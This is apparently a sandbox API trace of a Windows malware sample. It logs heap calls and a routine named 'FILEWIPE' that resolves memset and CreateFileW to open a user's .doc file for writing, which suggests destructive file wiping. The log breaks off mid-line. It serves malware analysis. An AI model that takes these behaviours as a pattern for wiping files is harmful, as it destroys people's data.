[0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.389] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0034.389] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.389] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.389] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x4645edc0, ftLastWriteTime.dwHighDateTime=0x1d5bb0b, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x0, dwReserved1=0x777648, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0x7c2240 [0034.389] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.390] CharLowerBuffW (in: lpsz="byte[15412]", cchLength=0xb | out: lpsz="byte[15412]") returned 0xb [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.391] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.391] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.391] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.391] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da318 [0034.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da318, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.391] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.391] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.392] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.392] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.394] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.394] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.394] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.394] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0034.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x88cc70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0034.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\463pkp6oz8wle1r.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.395] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.395] CharUpperBuffW (in: 